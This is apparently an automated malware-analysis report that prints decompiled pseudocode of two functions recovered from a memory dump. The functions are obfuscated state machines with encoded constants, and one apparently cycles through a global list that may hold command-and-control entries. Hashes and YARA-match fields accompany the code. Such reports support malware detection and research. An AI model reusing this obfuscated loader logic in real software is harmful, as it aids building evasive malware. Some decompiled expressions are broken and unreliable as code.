				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				void* _t317;
				intOrPtr _t334;
				void* _t343;
				signed int _t346;
				intOrPtr _t357;
				intOrPtr _t358;
				intOrPtr _t359;
				void* _t384;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				intOrPtr* _t396;
				signed int _t399;
				intOrPtr _t403;
				signed int* _t405;
				void* _t407;

				_t359 = __ecx;
				_push(_a8);
				_v176 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0121358A(_t317);
				_v16 = 0xe2afa9;
				_t358 = 0;
				_v12 = 0xe8fe81;
				_t405 =  &(( &_v184)[4]);
				_v8 = 0;
				_v4 = 0;
				_t399 = 0xc5a16cd;
				_v152 = 0x16c55a;
				_t403 = 0;
				_t390 = 0x52;
				_push("true");
				_v152 = _v152 * 0x7e;
				_v152 = _v152 ^ 0x9593734d;
				_v152 = _v152 * 0x27;
				_v152 = _v152 ^ 0x2b565726;
				_v160 = 0xd3489c;
				_v160 = _v160 + 0x93cd;
				_v160 = _v160 + 0xffff2680;
				_v160 = _v160 + 0xffff794a;
				_v160 = _v160 ^ 0x00d27c32;
				_v64 = 0x2f84e2;
				_v64 = _v64 ^ 0x4de93f40;
				_v64 = _v64 ^ 0x4dc6bba3;
				_v80 = 0x1be24f;
				_v80 = _v80 | 0x235428fb;
				_v80 = _v80 ^ 0x2353c844;
				_v120 = 0xf22c43;
				_v120 = _v120 << 0xc;
				_v120 = _v120 + 0x464d;
				_v120 = _v120 ^ 0x22cda256;
				_v128 = 0x5cc4be;
				_v128 = _v128 >> 7;
				_v128 = _v128 + 0x57a4;
				_v128 = _v128 ^ 0x0008b686;
				_v136 = 0xa3ff76;
				_v136 = _v136 << 7;
				_v136 = _v136 ^ 0xbe1be495;
				_v136 = _v136 ^ 0xefe2a377;
				_v100 = 0x946aa4;
				_v100 = _v100 / _t390;
				_v100 = _v100 ^ 0x000fb806;
				_v132 = 0x7d878a;
				_pop(_t391);
				_v132 = _v132 / _t391;
				_v132 = _v132 + 0x2f9;
				_v132 = _v132 ^ 0x000542bc;
				_v180 = 0xe3bf55;
				_v180 = _v180 >> 6;
				_v180 = _v180 + 0xffff773e;
				_v180 = _v180 ^ 0x8c2a66b6;
				_v180 = _v180 ^ 0x8c22efe7;
				_v44 = 0x9aff86;
				_v44 = _v44 << 0xb;
				_v44 = _v44 ^ 0xd7fa1a19;
				_v156 = 0x26ab5d;
				_v156 = _v156 >> 0x10;
				_v156 = _v156 | 0xcaa0c117;
				_v156 = _v156 << 0xa;
				_v156 = _v156 ^ 0x830d05c0;
				_v48 = 0xa14e19;
				_v48 = _v48 | 0x4d303281;
				_v48 = _v48 ^ 0x4dbb2754;
				_v68 = 0xf61636;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x0039c1ba;
				_v40 = 0x2115cf;
				_v40 = _v40 ^ 0xa207a02b;
				_v40 = _v40 ^ 0xa22acf19;
				_v148 = 0xc0aafe;
				_v148 = _v148 >> 3;
				_v148 = _v148 ^ 0xba58c75e;
				_v148 = _v148 | 0xe4d62354;
				_v148 = _v148 ^ 0xfed5de21;
				_v164 = 0xeceffe;
				_v164 = _v164 >> 9;
				_t392 = 3;
				_v164 = _v164 / _t392;
				_v164 = _v164 | 0x3a3b050d;
				_v164 = _v164 ^ 0x3a3ef861;
				_v76 = 0x42da81;
				_v76 = _v76 >> 9;
				_v76 = _v76 ^ 0x0001f136;
				_v144 = 0x377b00;
				_v144 = _v144 + 0xffff7b03;
				_v144 = _v144 | 0xed8d4517;
				_v144 = _v144 + 0x474e;
				_v144 = _v144 ^ 0xedc1bf3b;
				_v60 = 0x529a79;
				_v60 = _v60 >> 0x10;
				_v60 = _v60 ^ 0x00099224;
				_v124 = 0x8fcbd4;
				_t393 = 0x4b;
				_v124 = _v124 / _t393;
				_t394 = 0x3d;
				_v124 = _v124 / _t394;
				_v124 = _v124 ^ 0x000fe13a;
				_v72 = 0x2d37b4;
				_v72 = _v72 ^ 0xb9387ba4;
				_v72 = _v72 ^ 0xb912d11a;
				_v184 = 0x7a0678;
				_v184 = _v184 | 0x4e91e946;
				_v184 = _v184 ^ 0x687527e4;
				_v184 = _v184 + 0x597c;
				_v184 = _v184 ^ 0x268aedf8;
				_v172 = 0x81785;
				_v172 = _v172 + 0xffff7f8b;
				_v172 = _v172 << 0xf;
				_v172 = _v172 ^ 0x3e034c91;
				_v172 = _v172 ^ 0xf58ad6ee;
				_v52 = 0x9795e3;
				_t395 = 0x72;
				_v52 = _v52 * 0x58;
				_v52 = _v52 ^ 0x341dc3b3;
				_v92 = 0xdf88e7;
				_v92 = _v92 + 0xffff49f2;
				_v92 = _v92 ^ 0x00d663b2;
				_v108 = 0x1042e6;
				_v108 = _v108 >> 0xd;
				_v108 = _v108 ^ 0x0002fcf8;
				_v36 = 0xb7de0d;
				_v36 = _v36 + 0xa73b;
				_v36 = _v36 ^ 0x00b48d5d;
				_v84 = 0x7d7419;
				_v84 = _v84 / _t395;
				_v84 = _v84 ^ 0x0006a1ac;
				_v116 = 0xb994e1;
				_v116 = _v116 + 0xffff62f2;
				_v116 = _v116 << 0xb;
				_v116 = _v116 ^ 0xc7b464f4;
				_v168 = 0x398b08;
				_v168 = _v168 >> 0xf;
				_v168 = _v168 + 0x5c1b;
				_v168 = _v168 + 0xffff8532;
				_v168 = _v168 ^ 0xfffb96f1;
				_v104 = 0x89faea;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x0447e579;
				_v88 = 0xfd5523;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0x552c421d;
				_v96 = 0xe47266;
				_v96 = _v96 << 7;
				_v96 = _v96 ^ 0x723a4834;
				_v112 = 0x930317;
				_v112 = _v112 ^ 0x0c22be31;
				_v112 = _v112 >> 4;
				_v112 = _v112 ^ 0x00ca62ca;
				_v56 = 0xce9100;
				_v56 = _v56 ^ 0x8f2e07e0;
				_v56 = _v56 ^ 0x8fec4dc8;
				_t396 = _v28;
				while(1) {
					L1:
					_t334 = _v140;
					while(1) {
						L2:
						_t407 = _t399 - 0xc5a16cd;
						if(_t407 > 0) {
							goto L18;
						}
						L3:
						if(_t407 == 0) {
							_t399 = 0xcba4d8f;
							continue;
						} else {
							if(_t399 == _t384) {
								_t363 = _v156;
								_t343 = E012248B4(_v156, _t359, _t359, _v48, _t359, _v68, _v40, _t359, _v148, _v164,  &_v20, _t359, _t358, _v76, _v144, _t359,  &_v28);
								_t405 =  &(_t405[0x10]);
								if(_t343 == 0) {
									L15:
									_t399 = 0xeaf1192;
									L16:
									_t334 = _v140;
								} else {
									_t346 = E0122ED56(_t363);
									_t399 = 0xc870d87;
									_t334 = _v28 * 0x2c + _t358;
									_v140 = _t334;
									_t396 =  >=  ? _t358 : (_t346 & 0x0000001f) * 0x2c + _t358;
								}
								_t359 = _v176;
								_t384 = 0x8067b6;
								continue;
							} else {
								if(_t399 == 0x60bf0fb) {
									E01218CCC(_v172, _v52, _t403, _v92, _v108, _v152, _t359, _v32,  &_v24);
									_t399 =  !=  ? 0xf9b0111 : 0x685b925;
									_t334 = E0121EDC5(_v36, _v32, _v84, _v116);
									_t405 =  &(_t405[9]);
									L29:
									_t359 = _v176;
									_t384 = 0x8067b6;
									goto L30;
								} else {
									if(_t399 == 0x685b925) {
										_t396 = _t396 + 0x2c;
										asm("sbb esi, esi");
										_t399 = (_t399 & 0xfdd7fbf5) + 0xeaf1192;
										continue;
									} else {
										if(_t399 == 0xb0ce4d8) {
											return E0121AE43(_t358, _v112, _v56);
										}
										if(_t399 != 0xc516496) {
											L30:
											if(_t399 != 0xa0a29da) {
												goto L1;
											}
										} else {
											_push(_t359);
											_push(_t359);
											_t357 = E01225212(0x2000);
											_t359 = _v176;
											_t403 = _t357;
											_t405 =  &(_t405[3]);
											_t384 = 0x8067b6;
											_t399 =  !=  ? 0x8067b6 : 0xb0ce4d8;
											while(1) {
												L1:
												_t334 = _v140;
												while(1) {
													L2:
													_t407 = _t399 - 0xc5a16cd;
													if(_t407 > 0) {
														goto L18;
													}
													goto L3;
												}
												goto L18;
											}
										}
									}
								}
							}
						}
						L33:
						return _t334;
						L18:
						if(_t399 == 0xc870d87) {
							_t334 = E0121A323(_v64,  *_t396, _t359, _v72, _v184);
							_t405 =  &(_t405[3]);
							_v32 = _t334;
							if(_t334 == 0) {
								_t399 = 0x685b925;
								goto L29;
							} else {
								_t399 = 0x60bf0fb;
								goto L16;
							}
						} else {
							if(_t399 == 0xcba4d8f) {
								_push(_t359);
								_push(_t359);
								_t334 = E01225212(0x20000);
								_t358 = _t334;
								_t405 =  &(_t405[3]);
								if(_t358 != 0) {
									_t399 = 0xc516496;
									goto L16;
								}
							} else {
								if(_t399 == 0xeaf1192) {
									_t304 =  &_v96; // 0x723a4834
									E0121AE43(_t403, _v88,  *_t304);
									_t399 = 0xb0ce4d8;
									goto L16;
								} else {
									_t334 = 0xf9b0111;
									if(_t399 != 0xf9b0111) {
										goto L30;
									} else {
										E01229660(_t403, _v160, _v168, _v104, _a8);
										_t405 =  &(_t405[3]);
										goto L15;
									}
								}
							}
						}
						goto L33;
					}
				}
			}




































































                          0x0121b464
                          0x0121b46e
                          0x0121b475
                          0x0121b479
                          0x0121b480
                          0x0121b481
                          0x0121b482
                          0x0121b487
                          0x0121b492
                          0x0121b494
                          0x0121b49f
                          0x0121b4a2
                          0x0121b4ab
                          0x0121b4b2
                          0x0121b4b7
                          0x0121b4bf
                          0x0121b4c8
                          0x0121b4c9
                          0x0121b4cb
                          0x0121b4cf
                          0x0121b4dc
                          0x0121b4e0
                          0x0121b4e8
                          0x0121b4f0
                          0x0121b4f8
                          0x0121b500
                          0x0121b508
                          0x0121b510
                          0x0121b51b
                          0x0121b526
                          0x0121b531
                          0x0121b539
                          0x0121b541
                          0x0121b549
                          0x0121b551
                          0x0121b556
                          0x0121b55e
                          0x0121b566
                          0x0121b56e
                          0x0121b573
                          0x0121b57b
                          0x0121b583
                          0x0121b58b
                          0x0121b590
                          0x0121b598
                          0x0121b5a0
                          0x0121b5b0
                          0x0121b5b4
                          0x0121b5bc
                          0x0121b5c8
                          0x0121b5cb
                          0x0121b5cf
                          0x0121b5d7
                          0x0121b5df
                          0x0121b5e7
                          0x0121b5ec
                          0x0121b5f4
                          0x0121b5fc
                          0x0121b604
                          0x0121b60f
                          0x0121b617
                          0x0121b622
                          0x0121b62a
                          0x0121b62f
                          0x0121b637
                          0x0121b63c
                          0x0121b644
                          0x0121b64f
                          0x0121b65a
                          0x0121b665
                          0x0121b672
                          0x0121b67a
                          0x0121b685
                          0x0121b690
                          0x0121b69b
                          0x0121b6a6
                          0x0121b6ae
                          0x0121b6b3
                          0x0121b6bb
                          0x0121b6c3
                          0x0121b6cb
                          0x0121b6d3
                          0x0121b6de
                          0x0121b6e3
                          0x0121b6e9
                          0x0121b6f1
                          0x0121b6f9
                          0x0121b704
                          0x0121b70c
                          0x0121b717
                          0x0121b71f
                          0x0121b727
                          0x0121b72f
                          0x0121b737
                          0x0121b73f
                          0x0121b74a
                          0x0121b752
                          0x0121b75d
                          0x0121b769
                          0x0121b76e
                          0x0121b778
                          0x0121b77d
                          0x0121b783
                          0x0121b78b
                          0x0121b796
                          0x0121b7a1
                          0x0121b7ac
                          0x0121b7b4
                          0x0121b7bc
                          0x0121b7c4
                          0x0121b7cc
                          0x0121b7d4
                          0x0121b7dc
                          0x0121b7e4
                          0x0121b7e9
                          0x0121b7f1
                          0x0121b7f9
                          0x0121b80c
                          0x0121b80d
                          0x0121b814
                          0x0121b81f
                          0x0121b827
                          0x0121b82f
                          0x0121b837
                          0x0121b83f
                          0x0121b844
                          0x0121b84c
                          0x0121b857
                          0x0121b862
                          0x0121b86d
                          0x0121b87b
                          0x0121b87f
                          0x0121b887
                          0x0121b88f
                          0x0121b89c
                          0x0121b8a1
                          0x0121b8a9
                          0x0121b8b1
                          0x0121b8b6
                          0x0121b8be
                          0x0121b8c6
                          0x0121b8ce
                          0x0121b8d6
                          0x0121b8db
                          0x0121b8e3
                          0x0121b8eb
                          0x0121b8f0
                          0x0121b8f8
                          0x0121b900
                          0x0121b905
                          0x0121b90d
                          0x0121b915
                          0x0121b91d
                          0x0121b922
                          0x0121b92a
                          0x0121b935
                          0x0121b940
                          0x0121b94b
                          0x0121b952
                          0x0121b952
                          0x0121b952
                          0x0121b956
                          0x0121b956
                          0x0121b956
                          0x0121b95c
                          0x00000000
                          0x00000000
                          0x0121b962
                          0x0121b962
                          0x0121bae6
                          0x00000000
                          0x0121b968
                          0x0121b96a
                          0x0121ba8d
                          0x0121ba91
                          0x0121ba96
                          0x0121ba9b
                          0x0121badb
                          0x0121badb
                          0x0121bae0
                          0x0121bae0
                          0x0121ba9d
                          0x0121baa8
                          0x0121bab0
                          0x0121bac2
                          0x0121bac6
                          0x0121baca
                          0x0121baca
                          0x0121bacd
                          0x0121bad1
                          0x00000000
                          0x0121b970
                          0x0121b976
                          0x0121ba14
                          0x0121ba3e
                          0x0121ba41
                          0x0121ba46
                          0x0121bbb5
                          0x0121bbb5
                          0x0121bbb9
                          0x00000000
                          0x0121b978
                          0x0121b97e
                          0x0121b9d1
                          0x0121b9d6
                          0x0121b9de
                          0x00000000
                          0x0121b980
                          0x0121b986
                          0x00000000
                          0x0121bbdd
                          0x0121b992
                          0x0121bbbe
                          0x0121bbc4
                          0x00000000
                          0x0121bbc6
                          0x0121b998
                          0x0121b9ab
                          0x0121b9ac
                          0x0121b9b2
                          0x0121b9b7
                          0x0121b9bb
                          0x0121b9bd
                          0x0121b9c7
                          0x0121b9cc
                          0x0121b952
                          0x0121b952
                          0x0121b952
                          0x0121b956
                          0x0121b956
                          0x0121b956
                          0x0121b95c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0121b95c
                          0x00000000
                          0x0121b956
                          0x0121b952
                          0x0121b992
                          0x0121b97e
                          0x0121b976
                          0x0121b96a
                          0x0121bbe8
                          0x0121bbe8
                          0x0121baf0
                          0x0121baf6
                          0x0121bb93
                          0x0121bb98
                          0x0121bb9b
                          0x0121bba4
                          0x0121bbb0
                          0x00000000
                          0x0121bba6
                          0x0121bba6
                          0x00000000
                          0x0121bba6
                          0x0121bafc
                          0x0121bb02
                          0x0121bb5f
                          0x0121bb60
                          0x0121bb66
                          0x0121bb6b
                          0x0121bb6d
                          0x0121bb72
                          0x0121bb74
                          0x00000000
                          0x0121bb74
                          0x0121bb04
                          0x0121bb0a
                          0x0121bb38
                          0x0121bb42
                          0x0121bb48
                          0x00000000
                          0x0121bb0c
                          0x0121bb0c
                          0x0121bb13
                          0x00000000
                          0x0121bb19
                          0x0121bb2e
                          0x0121bb33
                          0x00000000
                          0x0121bb33
                          0x0121bb13
                          0x0121bb0a
                          0x0121bb02
                          0x00000000
                          0x0121baf6
                          0x0121b956

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &WV+$4H:r$@?M$MF$NG$|Y$'uh
                          • API String ID: 0-4100433312
                          • Opcode ID: 38e5f9a793c0e5397a6bc99214c1423183a92482fa00dd030636ba4dfd883c73
                          • Instruction ID: d08fa99dce91e3e78ed6e3af2db363a0493ab5d41fee94b7f498c6bd0cd2bf38
                          • Opcode Fuzzy Hash: 38e5f9a793c0e5397a6bc99214c1423183a92482fa00dd030636ba4dfd883c73
                          • Instruction Fuzzy Hash: 920232725183819FD768CF65C98AA5BFBF1FBD4308F008A1DE69996224D7B48909CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 012289A2, Relevance: 9.1, Strings: 7, Instructions: 336COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 92%
                          			E012289A2(void* __ecx, void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				char _v268;
				intOrPtr _v272;
				char _v276;
				intOrPtr _v280;
				char _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _t291;
				void* _t306;
				intOrPtr _t310;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t333;
				intOrPtr _t334;
				void* _t337;
				intOrPtr _t339;
				intOrPtr _t365;
				void* _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				void* _t384;
				void* _t385;
				signed int* _t387;
				void* _t389;
				void* _t395;

				_t395 = __fp0;
				_push(_a24);
				_t385 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0121358A(_t291);
				_v368 = 0x969fa1;
				_t387 =  &(( &_v404)[8]);
				_v368 = _v368 ^ 0x3dce833c;
				_t334 = 0;
				_t337 = 0x82450b3;
				_t380 = 0x39;
				_v368 = _v368 * 0x56;
				_v368 = _v368 ^ 0x9b96e7de;
				_v384 = 0x522009;
				_v384 = _v384 | 0xefa7af6e;
				_v384 = _v384 + 0x84bf;
				_v384 = _v384 << 0xc;
				_v384 = _v384 ^ 0x83454f1d;
				_v376 = 0xbc1b17;
				_v376 = _v376 * 0x6b;
				_v376 = _v376 >> 8;
				_v376 = _v376 ^ 0x00409983;
				_v340 = 0xeafe9b;
				_v340 = _v340 | 0x1be7931a;
				_v340 = _v340 / _t380;
				_v340 = _v340 ^ 0x007842c4;
				_v292 = 0xb0530f;
				_v292 = _v292 << 0xa;
				_v292 = _v292 ^ 0xc14db39e;
				_v288 = 0x51afd8;
				_v288 = _v288 + 0xffff1444;
				_v288 = _v288 ^ 0x0053892b;
				_v300 = 0x659e5;
				_v300 = _v300 + 0xffffd736;
				_v300 = _v300 ^ 0x00069f22;
				_v320 = 0x400a9d;
				_v320 = _v320 + 0xbe72;
				_v320 = _v320 + 0xffffedb0;
				_v320 = _v320 ^ 0x00466b5a;
				_v352 = 0xd7c1d3;
				_v352 = _v352 | 0x43544fa1;
				_v352 = _v352 + 0xf105;
				_v352 = _v352 ^ 0x43de8af9;
				_v328 = 0x7c4df2;
				_v328 = _v328 + 0xffff5764;
				_v328 = _v328 + 0x5d13;
				_v328 = _v328 ^ 0x0078d700;
				_v308 = 0x886a66;
				_v308 = _v308 + 0xffffb9a9;
				_v308 = _v308 ^ 0x0083c87a;
				_v344 = 0x372a1f;
				_v344 = _v344 >> 0xe;
				_v344 = _v344 + 0xffff2200;
				_v344 = _v344 ^ 0xfffac0df;
				_v296 = 0xe8ac11;
				_v296 = _v296 * 0x24;
				_v296 = _v296 ^ 0x20bd2906;
				_v304 = 0xc63cda;
				_v304 = _v304 * 0x18;
				_v304 = _v304 ^ 0x1295b197;
				_v332 = 0xe4d16;
				_v332 = _v332 + 0x4e9b;
				_v332 = _v332 >> 0xd;
				_v332 = _v332 ^ 0x0005dbab;
				_v372 = 0x45ead6;
				_v372 = _v372 + 0xffffe00c;
				_v372 = _v372 | 0x2bf1f08a;
				_v372 = _v372 ^ 0x2bf477f7;
				_v360 = 0x221565;
				_v360 = _v360 >> 2;
				_v360 = _v360 + 0xffffd8ea;
				_v360 = _v360 ^ 0x0006f076;
				_v312 = 0x4ed877;
				_v312 = _v312 << 1;
				_v312 = _v312 ^ 0x00935492;
				_v404 = 0x8469bf;
				_v404 = _v404 ^ 0x075bbf41;
				_v404 = _v404 | 0x28bf3f30;
				_t381 = 0x7e;
				_push("true");
				_v404 = _v404 * 0x49;
				_v404 = _v404 ^ 0xaff6c928;
				_v396 = 0x1bbe4c;
				_v396 = _v396 / _t381;
				_v396 = _v396 + 0xffffcd97;
				_pop(_t382);
				_v396 = _v396 * 0x38;
				_v396 = _v396 ^ 0x0009bf96;
				_v316 = 0x795385;
				_v316 = _v316 | 0x4718ac15;
				_v316 = _v316 >> 9;
				_v316 = _v316 ^ 0x0025e58d;
				_v324 = 0x70fc4d;
				_v324 = _v324 + 0x3f88;
				_v324 = _v324 + 0xcd5b;
				_v324 = _v324 ^ 0x007a737b;
				_v364 = 0xf2bf60;
				_v364 = _v364 * 0x7e;
				_v364 = _v364 / _t382;
				_v364 = _v364 ^ 0x01c559c7;
				_v336 = 0xcb080e;
				_v336 = _v336 << 0xe;
				_v336 = _v336 ^ 0xc2002858;
				_v380 = 0x5b6f54;
				_v380 = _v380 | 0x2762fee8;
				_v380 = _v380 + 0xffff4494;
				_v380 = _v380 ^ 0x277b3211;
				_v400 = 0xb8b9c5;
				_v400 = _v400 + 0xb5f;
				_v400 = _v400 << 1;
				_v400 = _v400 << 0xd;
				_v400 = _v400 ^ 0x3147c5ea;
				_v356 = 0xab28bc;
				_v356 = _v356 ^ 0x8927fd9f;
				_v356 = _v356 | 0x2a302ed7;
				_v356 = _v356 ^ 0xabba2c68;
				_v392 = 0x4b8eaf;
				_v392 = _v392 << 9;
				_v392 = _v392 >> 6;
				_v392 = _v392 << 8;
				_v392 = _v392 ^ 0x5c793020;
				_v348 = 0xf3aa03;
				_v348 = _v348 + 0xffff1528;
				_v348 = _v348 ^ 0x7304fcf0;
				_v348 = _v348 ^ 0x73fb1ffb;
				_v388 = 0x3dd2bd;
				_v388 = _v388 | 0x311b3931;
				_v388 = _v388 + 0x59a2;
				_v388 = _v388 + 0x7e2f;
				_v388 = _v388 ^ 0x3140d78e;
				while(1) {
					L1:
					_t306 = 0xbbb7183;
					do {
						while(1) {
							L2:
							_t389 = _t337 - 0x80cc2ab;
							if(_t389 > 0) {
								break;
							}
							if(_t389 == 0) {
								_t321 = E01224CF5( &_v268, _v404, _v396, _v316, _a24);
								_t387 =  &(_t387[3]);
								if(_t321 != 0) {
									_t379 = 0xf971f34;
									_t334 = 1;
								}
								_t337 = 0x2e35f5d;
								while(1) {
									L1:
									_t306 = 0xbbb7183;
									goto L2;
								}
							} else {
								if(_t337 == 0xad90c7) {
									_t323 = E012184F0(_v292, _v288, _a16, _t385, _v300,  &_v284);
									_t387 =  &(_t387[4]);
									if(_t323 != 0) {
										_t337 = 0xf8f92a;
										while(1) {
											L1:
											_t306 = 0xbbb7183;
											goto L2;
										}
									}
								} else {
									if(_t337 == 0xf8f92a) {
										if(_v280 >= _v388) {
											_t325 = E01221591( &_v284,  &_v276);
										} else {
											_t325 = E0121A3E7( &_v284);
										}
										_t384 = _t325;
										_t306 = 0xbbb7183;
										_t337 =  !=  ? 0xbbb7183 : 0xb88ce56;
										continue;
									} else {
										if(_t337 == 0x2e35f5d) {
											_t241 =  &_v324; // 0x466b5a
											E0121AE43(_v268,  *_t241, _v364);
											goto L11;
										} else {
											if(_t337 != 0x5f87054) {
												goto L35;
											} else {
												_t333 = E01230370( &_v276, _v296, _t395, _v304, _v332,  *( *((intOrPtr*)( *0x1235208 + 0x30)) + 0x40) & 0x0000ffff,  *( *((intOrPtr*)( *0x1235208 + 0x30)) + 0x24) & 0x0000ffff, _v372,  &_v268,  &_v260, _t384, _v360,  *((intOrPtr*)( *0x1235208 + 0x30)), _v312);
												_t387 =  &(_t387[0xb]);
												if(_t333 == 0) {
													_t379 = 0x9c17656;
													L11:
													_t337 = 0xb88ce56;
													while(1) {
														L1:
														_t306 = 0xbbb7183;
														goto L2;
													}
												} else {
													_t337 = 0x80cc2ab;
													while(1) {
														L1:
														_t306 = 0xbbb7183;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
							L38:
							return _t334;
						}
						if(_t337 == 0x82450b3) {
							_t384 = 0;
							E0122365D(_v368,  &_v260, _v384, 0x100, _v376, _v340);
							_t387 =  &(_t387[4]);
							_t337 = 0xad90c7;
							_v276 = 0;
							_v272 = 0;
							_v284 = 0;
							_v280 = 0;
							goto L34;
						} else {
							if(_t337 == 0x9c17656) {
								_t339 =  *0x1235208;
								_t310 =  *((intOrPtr*)( *((intOrPtr*)(_t339 + 0x30)) + 0x20));
								 *((intOrPtr*)(_t339 + 0x2c)) =  *((intOrPtr*)(_t339 + 0x2c)) + 1;
								_t365 =  *((intOrPtr*)(_t339 + 0x2c));
								 *((intOrPtr*)(_t339 + 0x30)) = _t310;
								if(_t310 == 0) {
									 *((intOrPtr*)(_t339 + 0x30)) =  *((intOrPtr*)(_t339 + 0x24));
								}
								if(_t365 >=  *((intOrPtr*)( *0x1235208 + 0x10))) {
									 *( *0x1235208 + 0x2c) =  *( *0x1235208 + 0x2c) & 0x00000000;
								} else {
									_t337 = 0x82450b3;
									goto L1;
								}
							} else {
								if(_t337 == 0xb88ce56) {
									E0121AE43(_v284, _v336, _v380);
									E0121AE43(_t384, _v400, _v356);
									E0121AE43(_v276, _v392, _v348);
									_t337 = _t379;
									L34:
									_t306 = 0xbbb7183;
									goto L35;
								} else {
									if(_t337 != _t306) {
										goto L35;
									} else {
										_push(_t337);
										_t319 = E01212C02(1, 0x40);
										_push(_v344);
										_push( &_v260);
										_push(0xb);
										_push(_v308);
										E01214A97(_t319, _v328);
										_t387 =  &(_t387[6]);
										_t337 = 0x5f87054;
										while(1) {
											L1:
											_t306 = 0xbbb7183;
											goto L2;
										}
									}
								}
							}
						}
						goto L38;
						L35:
					} while (_t337 != 0xf971f34);
					goto L38;
				}
			}




























































                          0x012289a2
                          0x012289ac
                          0x012289b3
                          0x012289b5
                          0x012289bc
                          0x012289c3
                          0x012289ca
                          0x012289d1
                          0x012289d8
                          0x012289d9
                          0x012289da
                          0x012289df
                          0x012289e7
                          0x012289ea
                          0x012289f9
                          0x012289fb
                          0x01228a02
                          0x01228a03
                          0x01228a07
                          0x01228a0f
                          0x01228a17
                          0x01228a1f
                          0x01228a27
                          0x01228a2c
                          0x01228a34
                          0x01228a41
                          0x01228a45
                          0x01228a4a
                          0x01228a52
                          0x01228a5a
                          0x01228a68
                          0x01228a6c
                          0x01228a74
                          0x01228a7f
                          0x01228a87
                          0x01228a92
                          0x01228a9d
                          0x01228aa8
                          0x01228ab3
                          0x01228abb
                          0x01228ac3
                          0x01228acb
                          0x01228ad3
                          0x01228adb
                          0x01228ae3
                          0x01228aeb
                          0x01228af3
                          0x01228afb
                          0x01228b03
                          0x01228b0b
                          0x01228b13
                          0x01228b1b
                          0x01228b23
                          0x01228b2b
                          0x01228b33
                          0x01228b3b
                          0x01228b43
                          0x01228b4b
                          0x01228b50
                          0x01228b58
                          0x01228b60
                          0x01228b6d
                          0x01228b71
                          0x01228b79
                          0x01228b86
                          0x01228b8a
                          0x01228b92
                          0x01228b9a
                          0x01228ba2
                          0x01228ba7
                          0x01228baf
                          0x01228bb9
                          0x01228bc1
                          0x01228bc9
                          0x01228bd1
                          0x01228bd9
                          0x01228bde
                          0x01228be6
                          0x01228bee
                          0x01228bf6
                          0x01228bfa
                          0x01228c02
                          0x01228c0a
                          0x01228c12
                          0x01228c21
                          0x01228c22
                          0x01228c24
                          0x01228c28
                          0x01228c30
                          0x01228c40
                          0x01228c44
                          0x01228c51
                          0x01228c52
                          0x01228c56
                          0x01228c5e
                          0x01228c66
                          0x01228c6e
                          0x01228c73
                          0x01228c7b
                          0x01228c83
                          0x01228c8b
                          0x01228c93
                          0x01228c9b
                          0x01228ca8
                          0x01228cb2
                          0x01228cb6
                          0x01228cbe
                          0x01228cc6
                          0x01228ccb
                          0x01228cd3
                          0x01228cdb
                          0x01228ce3
                          0x01228ceb
                          0x01228cf3
                          0x01228cfb
                          0x01228d03
                          0x01228d07
                          0x01228d0c
                          0x01228d14
                          0x01228d1c
                          0x01228d24
                          0x01228d2c
                          0x01228d34
                          0x01228d3c
                          0x01228d41
                          0x01228d46
                          0x01228d4b
                          0x01228d5b
                          0x01228d63
                          0x01228d6b
                          0x01228d73
                          0x01228d7b
                          0x01228d83
                          0x01228d8b
                          0x01228d93
                          0x01228d9b
                          0x01228da3
                          0x01228da3
                          0x01228da3
                          0x01228da8
                          0x01228da8
                          0x01228da8
                          0x01228da8
                          0x01228dae
                          0x00000000
                          0x00000000
                          0x01228db4
                          0x01228f09
                          0x01228f0e
                          0x01228f13
                          0x01228f17
                          0x01228f1c
                          0x01228f1c
                          0x01228f24
                          0x01228da3
                          0x01228da3
                          0x01228da3
                          0x00000000
                          0x01228da3
                          0x01228dba
                          0x01228dc0
                          0x01228ed5
                          0x01228eda
                          0x01228edf
                          0x01228ee5
                          0x01228da3
                          0x01228da3
                          0x01228da3
                          0x00000000
                          0x01228da3
                          0x01228da3
                          0x01228dc6
                          0x01228dcc
                          0x01228e88
                          0x01228e98
                          0x01228e8a
                          0x01228e8a
                          0x01228e8a
                          0x01228e9d
                          0x01228ea6
                          0x01228eab
                          0x00000000
                          0x01228dd2
                          0x01228dd8
                          0x01228e63
                          0x01228e6e
                          0x00000000
                          0x01228dde
                          0x01228de4
                          0x00000000
                          0x01228dea
                          0x01228e3a
                          0x01228e3f
                          0x01228e44
                          0x01228e50
                          0x01228e55
                          0x01228e55
                          0x01228da3
                          0x01228da3
                          0x01228da3
                          0x00000000
                          0x01228da3
                          0x01228e46
                          0x01228e46
                          0x01228da3
                          0x01228da3
                          0x01228da3
                          0x00000000
                          0x01228da3
                          0x01228da3
                          0x01228e44
                          0x01228de4
                          0x01228dd8
                          0x01228dcc
                          0x01228dc0
                          0x01229070
